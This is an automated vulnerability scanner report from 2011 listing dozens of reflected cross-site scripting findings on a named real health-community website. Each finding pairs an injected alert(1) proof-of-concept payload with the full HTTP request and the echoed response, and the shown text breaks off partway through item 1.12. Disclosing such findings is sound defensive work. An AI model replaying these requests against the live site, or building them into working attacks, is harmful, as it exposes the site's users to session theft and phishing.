XSS, Cross Site Scripting, CAPEC-86, exchanges.webmd.com

CAPEC-86: Embedding Script (XSS) in HTTP Headers | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Sat Feb 12 08:35:38 CST 2011.


The DORK Report

1. Cross-site scripting (reflected)

1.1. http://exchanges.webmd.com/default.htm [REST URL parameter 1]

1.2. http://exchanges.webmd.com/default.htm [name of an arbitrarily supplied request parameter]

1.3. http://exchanges.webmd.com/default.htm [name of an arbitrarily supplied request parameter]

1.4. http://exchanges.webmd.com/pet-health-exchange [REST URL parameter 1]

1.5. http://exchanges.webmd.com/pet-health-exchange [name of an arbitrarily supplied request parameter]

1.6. http://exchanges.webmd.com/pet-health-exchange [name of an arbitrarily supplied request parameter]

1.7. http://exchanges.webmd.com/skin-and-beauty-exchange [REST URL parameter 1]

1.8. http://exchanges.webmd.com/skin-and-beauty-exchange [name of an arbitrarily supplied request parameter]

1.9. http://exchanges.webmd.com/skin-and-beauty-exchange [name of an arbitrarily supplied request parameter]

1.10. http://exchanges.webmd.com/webmd-exchanges/blogs [REST URL parameter 1]

1.11. http://exchanges.webmd.com/webmd-exchanges/blogs [REST URL parameter 2]

1.12. http://exchanges.webmd.com/webmd-exchanges/blogs [name of an arbitrarily supplied request parameter]

1.13. http://exchanges.webmd.com/webmd-exchanges/blogs [name of an arbitrarily supplied request parameter]

1.14. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [REST URL parameter 1]

1.15. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [REST URL parameter 2]

1.16. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [name of an arbitrarily supplied request parameter]

1.17. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges [name of an arbitrarily supplied request parameter]

1.18. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [REST URL parameter 1]

1.19. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [REST URL parameter 2]

1.20. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [name of an arbitrarily supplied request parameter]

1.21. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges [name of an arbitrarily supplied request parameter]

1.22. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [REST URL parameter 1]

1.23. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [REST URL parameter 2]

1.24. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [name of an arbitrarily supplied request parameter]

1.25. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges [name of an arbitrarily supplied request parameter]

1.26. http://exchanges.webmd.com/webmd-exchanges/health-experts [REST URL parameter 1]

1.27. http://exchanges.webmd.com/webmd-exchanges/health-experts [REST URL parameter 2]

1.28. http://exchanges.webmd.com/webmd-exchanges/health-experts [name of an arbitrarily supplied request parameter]

1.29. http://exchanges.webmd.com/webmd-exchanges/health-experts [name of an arbitrarily supplied request parameter]

1.30. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [REST URL parameter 1]

1.31. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [REST URL parameter 2]

1.32. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [name of an arbitrarily supplied request parameter]

1.33. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges [name of an arbitrarily supplied request parameter]

1.34. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [REST URL parameter 1]

1.35. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [REST URL parameter 2]

1.36. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [name of an arbitrarily supplied request parameter]

1.37. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges [name of an arbitrarily supplied request parameter]

1.38. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [REST URL parameter 1]

1.39. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [REST URL parameter 2]

1.40. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [name of an arbitrarily supplied request parameter]

1.41. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges [name of an arbitrarily supplied request parameter]

1.42. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [REST URL parameter 1]

1.43. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [REST URL parameter 2]

1.44. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [name of an arbitrarily supplied request parameter]

1.45. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges [name of an arbitrarily supplied request parameter]

1.46. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [REST URL parameter 1]

1.47. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [REST URL parameter 2]

1.48. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [name of an arbitrarily supplied request parameter]

1.49. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges [name of an arbitrarily supplied request parameter]

1.50. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [REST URL parameter 1]

1.51. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [REST URL parameter 2]

1.52. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [name of an arbitrarily supplied request parameter]

1.53. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges [name of an arbitrarily supplied request parameter]

1.54. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [REST URL parameter 1]

1.55. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [REST URL parameter 2]

1.56. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [name of an arbitrarily supplied request parameter]

1.57. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges [name of an arbitrarily supplied request parameter]

2. Cross-domain script include

2.1. http://exchanges.webmd.com/default.htm

2.2. http://exchanges.webmd.com/pet-health-exchange

2.3. http://exchanges.webmd.com/skin-and-beauty-exchange

2.4. http://exchanges.webmd.com/webmd-exchanges/blogs

2.5. http://exchanges.webmd.com/webmd-exchanges/cancer-exchanges

2.6. http://exchanges.webmd.com/webmd-exchanges/digestive-disorders-exchanges

2.7. http://exchanges.webmd.com/webmd-exchanges/eating-diet-exchanges

2.8. http://exchanges.webmd.com/webmd-exchanges/health-experts

2.9. http://exchanges.webmd.com/webmd-exchanges/mens-health-exchanges

2.10. http://exchanges.webmd.com/webmd-exchanges/mental-health-exchanges

2.11. http://exchanges.webmd.com/webmd-exchanges/parenting-exchanges

2.12. http://exchanges.webmd.com/webmd-exchanges/pregnancy-exchanges

2.13. http://exchanges.webmd.com/webmd-exchanges/sex-relationships-exchanges

2.14. http://exchanges.webmd.com/webmd-exchanges/trying-to-conceive-exchanges

2.15. http://exchanges.webmd.com/webmd-exchanges/womens-health-exchanges

3. Email addresses disclosed



1. Cross-site scripting (reflected)
There are 57 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://exchanges.webmd.com/default.htm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /default.htm

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68316'-alert(1)-'5976a95f57f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /68316'-alert(1)-'5976a95f57f HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59421
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:52 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
//as.webmd.com/html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252f68316'-alert(1)-'5976a95f57f&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.2. http://exchanges.webmd.com/default.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /default.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f41e"-alert(1)-"bfbb0bdf73b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.htm?8f41e"-alert(1)-"bfbb0bdf73b=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 113180
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:44 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/default.htm?8f41e"-alert(1)-"bfbb0bdf73b=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id=""; var space_title=""; var space_name=""; var space_type=""; var space_sit
...[SNIP]...

1.3. http://exchanges.webmd.com/default.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /default.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 582cd'-alert(1)-'b6607421c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /default.htm?582cd'-alert(1)-'b6607421c6a=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 113172
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:53:45 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
rc="http://as.webmd.com/html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=8000&au1=&au2=&uri=%2fdefault.htm%3f582cd'-alert(1)-'b6607421c6a%3d1&artid=091e9c5e803f6d03&inst=0&amp;leaf=">
...[SNIP]...

1.4. http://exchanges.webmd.com/pet-health-exchange [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /pet-health-exchange

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86bb6'-alert(1)-'7f58c8459fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pet-health-exchange86bb6'-alert(1)-'7f58c8459fb HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59478
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:55:21 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fpet-health-exchange86bb6'-alert(1)-'7f58c8459fb&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.5. http://exchanges.webmd.com/pet-health-exchange [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /pet-health-exchange

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef7e1'-alert(1)-'edc35b8508c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pet-health-exchange?ef7e1'-alert(1)-'edc35b8508c=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 288274
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp2
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:41 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
src="http://as.webmd.com/html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=35&hcent=&scent=&exgid=55&app='+adApp+adAuid+'&pos=101&exg1=1165&sec=&au1=&au2=&uri=%2fpet-health-exchange%3fef7e1'-alert(1)-'edc35b8508c%3d1&artid=091e9c5e80410967&inst=0&amp;leaf=">
...[SNIP]...

1.6. http://exchanges.webmd.com/pet-health-exchange [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /pet-health-exchange

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9923e"-alert(1)-"3876479fafc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pet-health-exchange?9923e"-alert(1)-"3876479fafc=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 288292
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp1
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:40 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/pet-health-exchange?9923e"-alert(1)-"3876479fafc=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id="55"; var space_title="Pet Health Community"; var space_name="pet-health-ex
...[SNIP]...

1.7. http://exchanges.webmd.com/skin-and-beauty-exchange [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /skin-and-beauty-exchange

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bfd79'-alert(1)-'9b8ea055f19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /skin-and-beauty-exchangebfd79'-alert(1)-'9b8ea055f19 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59493
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:55:15 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ransactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fskin-and-beauty-exchangebfd79'-alert(1)-'9b8ea055f19&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.8. http://exchanges.webmd.com/skin-and-beauty-exchange [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /skin-and-beauty-exchange

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19778"-alert(1)-"364ae7077e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /skin-and-beauty-exchange?19778"-alert(1)-"364ae7077e0=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 301707
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:27 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<script language="javascript" type="text/javascript"> var s_furl="/skin-and-beauty-exchange?19778"-alert(1)-"364ae7077e0=1"; var s_sponsor_program=""; var s_sensitive="false"; var image_server_url="http://img.webmd.com/dtmcms/live"; var space_id="59"; var space_title="Skin & Beauty Community"; var space_name="skin-and-b
...[SNIP]...

1.9. http://exchanges.webmd.com/skin-and-beauty-exchange [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /skin-and-beauty-exchange

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 884d3'-alert(1)-'5929a12632 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /skin-and-beauty-exchange?884d3'-alert(1)-'5929a12632=1 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 301686
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:30 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
http://as.webmd.com/html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=35&hcent=&scent=&exgid=59&app='+adApp+adAuid+'&pos=101&exg1=1011&sec=&au1=&au2=&uri=%2fskin-and-beauty-exchange%3f884d3'-alert(1)-'5929a12632%3d1&artid=091e9c5e80410dd6&inst=0&amp;leaf=">
...[SNIP]...

1.10. http://exchanges.webmd.com/webmd-exchanges/blogs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/blogs

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceb52'-alert(1)-'96eaa884564 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchangesceb52'-alert(1)-'96eaa884564/blogs HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59494
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp4
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:01 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
html.ng/transactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchangesceb52'-alert(1)-'96eaa884564%252fblogs&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.11. http://exchanges.webmd.com/webmd-exchanges/blogs [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
Path:   /webmd-exchanges/blogs

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb853'-alert(1)-'3c9824a60b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webmd-exchanges/blogseb853'-alert(1)-'3c9824a60b3 HTTP/1.1
Host: exchanges.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 59494
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
x-wbmd-server: heapp3
X-AspNet-Version: 2.0.50727
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Server: wws
Date: Sat, 12 Feb 2011 13:54:10 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
ansactionID='+transID+'&tile='+tileID+'&site=2&affiliate=20&hcent=&scent=&exgid=[exgid]&app='+adApp+adAuid+'&pos=101&exg1=4116&sec=&au1=&au2=&uri=%2f404%3faspxerrorpath%3d%252fwebmd-exchanges%252fblogseb853'-alert(1)-'3c9824a60b3&artid=091e9c5e804851a3&inst=0&amp;leaf=">
...[SNIP]...

1.12. http://exchanges.webmd.com/webmd-exchanges/blogs [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://exchanges.webmd.com
